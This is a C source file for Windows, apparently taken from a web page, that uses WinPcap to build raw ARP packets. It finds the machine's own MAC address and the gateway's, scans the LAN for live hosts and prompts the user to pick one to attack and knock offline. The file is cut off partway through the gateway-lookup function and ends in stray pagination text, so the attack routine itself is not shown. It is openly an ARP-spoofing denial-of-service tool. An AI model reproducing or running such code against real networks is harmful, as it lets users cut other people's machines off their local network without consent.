/*
author:fallgold
email:heidaizx@126.com
date:2009.8.14
HomePage:www.fallgold.cn
*/
#include "pcap.h"
#include "remote-ext.h"
#include "process.h"
#pragma pack(1)//设置内存边界对齐方式
#pragma comment(lib,"wpcap.lib")
#pragma comment (lib,"ws2_32.lib")
#define ETH_IP 0x0800 //协议类型
#define ETH_ARP 0x0806 //以太网帧类型
#define ARP_REPLY 0x0002 //以太网应答
#define ARP_REQUEST 0x0001 //以太网请求
#define ARP_HARDWARE 0x0001 //硬件类型
//28字节ARP帧结构
struct arp_head
{
unsigned short hardware_type; //硬件类型
unsigned short protocol_type; //协议类型
unsigned char hardware_add_len; //硬件地址长度
unsigned char protocol_add_len; //协议地址长度
unsigned short operation_field; //操作字段
unsigned char source_mac_add[6]; //源mac地址
unsigned long source_ip_add; //源ip地址
unsigned char dest_mac_add[6]; //目的mac地址
unsigned long dest_ip_add; //目的ip地址
};
//18字节以太网帧结构
struct ethernet_head
{
unsigned char dest_mac_add[6]; //目的mac地址
unsigned char source_mac_add[6]; //源mac地址
unsigned short type; //帧类型
};
//arp最终包结构
struct arp_packet
{
ethernet_head ed;
arp_head ah;
};
struct host //主机ip和mac信息
{
unsigned long ip;
unsigned char mac[6];
};
host pcGroup[256];
#pragma pack(1)
pcap_t *adhandle; //指向选择网卡的指针
unsigned char selfMac[6]; //记录自己的mac地址
unsigned char getWayMac[6]; //记录网关的mac地址
int GetSelfMac(); //获取本机mac地址
int getGateWayMac(); //获得网关mac地址
HANDLE hThread; //线程句柄
DWORD ThreadId; //线程ID
void GetlivePc(); //arp_pack包接收线程并且存储活动主机mac和ip信息
void sendArpPacket(); //向局域网内发送arp请求包
BOOL flag = FALSE; //线程控制标志
int aliveNum = 0; //记录活动主机的数量
void arpAttack(int choice,int attackTimes); //攻击函数
int main()
{
pcap_if_t *alldevs;
pcap_if_t *d;
int inum;
int i=0;
int choice;
int attackTimes=0;
char errbuf[PCAP_ERRBUF_SIZE];
/* 获取本机设备列表 */
if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1)
{
fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
exit(1);
}
/* 打印列表 */
for(d=alldevs; d; d=d->next)
{
printf("%d. %s", ++i, d->name);
if (d->description)
printf(" (%s)\n", d->description);
else
printf(" (No description available)\n");
}
if(i==0)
{
printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
return -1;
}
printf("Enter the interface number (1-%d):",i);
scanf("%d", &inum);
if(inum < 1 || inum > i)
{
printf("\nInterface number out of range.\n");
/* 释放设备列表 */
pcap_freealldevs(alldevs);
return -1;
}
/* 跳转到选中的适配器 */
for(d=alldevs, i=0; i < inum-1 ;d=d->next, i++);
/* 打开设备 */
if ( (adhandle= pcap_open(d->name, // 设备名
65536, // 65535保证能捕获到不同数据链路层上的每个数据包的全部内容
PCAP_OPENFLAG_PROMISCUOUS, // 混杂模式
1000, // 读取超时时间
NULL, // 远程机器验证
errbuf // 错误缓冲池
) ) == NULL)
{
fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name);
/* 释放设备列表 */
pcap_freealldevs(alldevs);
return -1;
}
printf("本机mac地址为: ");
while(GetSelfMac()==0);
printf("\n");
printf("网关mac地址为: ");
while(getGateWayMac()==0);
hThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)GetlivePc,NULL,0,NULL);
sendArpPacket();
WaitForSingleObject(hThread,INFINITE);
//选择要攻击的主机序号
char buf[100];
struct in_addr in;
while(!flag)
{
Sleep(1000);
}
for(i=0;i<aliveNum;i++)
{
memset(buf,0,100);
in.S_un.S_addr=pcGroup[i].ip;
sprintf(buf,"序号: %d IP: %x Mac: %02x-%02x-%02x-%02x-%02x-%02x\n",
i+1,
inet_ntoa(in),
pcGroup[i].mac[0],
pcGroup[i].mac[1],
pcGroup[i].mac[2],
pcGroup[i].mac[3],
pcGroup[i].mac[4],
pcGroup[i].mac[5]);
printf("%s",buf);
}
printf("请输入要攻击的主机序号(1-%d):",aliveNum);
scanf("%d",&choice);
if(choice<0||choice>aliveNum)
{
printf("输入越界,程序退出!");
exit(0);
}
printf("\n为了达到较好的效果请你发送数据包的个数不小于100\n");
printf("请输入要攻击的次数:");
scanf("%i",&attackTimes);
if(attackTimes<0)
{
printf("输入越界,程序退出!");
exit(0);
}
//攻击网络主机使其断线
arpAttack(choice,attackTimes);
return 0;
}
int GetSelfMac()
{
unsigned char sendbuf[42];//arp包结构大小
int i = -1;
int res;
ethernet_head eh;
arp_head ah;
struct pcap_pkthdr * pkt_header;
const u_char * pkt_data;
memset(eh.dest_mac_add,0xff,6);
memset(eh.source_mac_add,0x0f,6);
memset(ah.source_mac_add,0x0f,6);
memset(ah.dest_mac_add,0x00,6);
eh.type = htons(ETH_ARP);
ah.hardware_type = htons(ARP_HARDWARE);
ah.protocol_type = htons(ETH_IP);
ah.hardware_add_len = 6;
ah.protocol_add_len = 4;
ah.operation_field = htons(ARP_REQUEST);
ah.dest_ip_add = inet_addr("219.219.71.232");
ah.source_ip_add = inet_addr("219.219.71.230"); //随便设的请求方ip
memset(sendbuf,0,sizeof(sendbuf));
memcpy(sendbuf,&eh,sizeof(eh));
memcpy(sendbuf+sizeof(eh),&ah,sizeof(ah));
if(pcap_sendpacket(adhandle,sendbuf,42)==0)
{
printf("\nPacketSend succeed\n");
}
else
{
printf("PacketSendPacket in getmine Error: %d\n",GetLastError());
return 0;
}
while((res = pcap_next_ex(adhandle,&pkt_header,&pkt_data)) >= 0)
{
if(*(unsigned short *)(pkt_data+12) == htons(ETH_ARP)&&
*(unsigned short*)(pkt_data+20) == htons(ARP_REPLY)&&
*(unsigned long*)(pkt_data+38) == inet_addr("219.219.71.230"))
{
for(i=0; i<6; i++)
{
selfMac[i] = *(unsigned char*)(pkt_data+22+i);
printf("%02x",selfMac[i]);
}
break;
}
}
if(i==6) return 1;
else return 0;
}
int getGateWayMac()
{
unsigned char sendbuf[42];//arp包结构大小
int i = -1;
int res;
ethernet_head eh;
arp_head ah;
struct pcap_pkthdr * pkt_header;
const u_char * pkt_data;
memset(eh.dest_mac_add,0xff,6);
memcpy(eh.source_mac_add,selfMac,6);
memcpy(ah.source_mac_add,selfMac,6);
memset(ah.dest_mac_add,0x00,6);
eh.type = htons(ETH_ARP);
ah.hardware_type = htons(ARP_HARDWARE);
ah.protocol_type = htons(ETH_IP);
ah.hardware_add_len = 6;
ah.protocol_add_len = 4;
ah.operation_field = htons(ARP_REQUEST);
ah.dest_ip_add = inet_addr("219.219.71.1");
ah.source_ip_add = inet_addr("219.219.71.232");
memset(sendbuf,0,sizeof(sendbuf));
memcpy(sendbuf,&eh,sizeof(eh));
memcpy(sendbuf+sizeof(eh),&ah,sizeof(ah));
if(pcap_sendpacket(adhandle,sendbuf,42)==0)
{
printf("\nPacketSend succeed\n");
}
else
{
printf("PacketSendPacket in getmine Error: %d\n",GetLastError());
return 0;
}
while((res = pcap_next_ex(adhandle,&pkt_header,&pkt_data)) >= 0)
{
if(*(unsigned short *)(pkt_data+12) == htons(ETH_ARP)&&
*(unsigned short*)(pkt_data+20) == htons(ARP_REPLY)&&
*(unsigned long*)(pkt_data+38) == inet_
- 1
- 2
前往页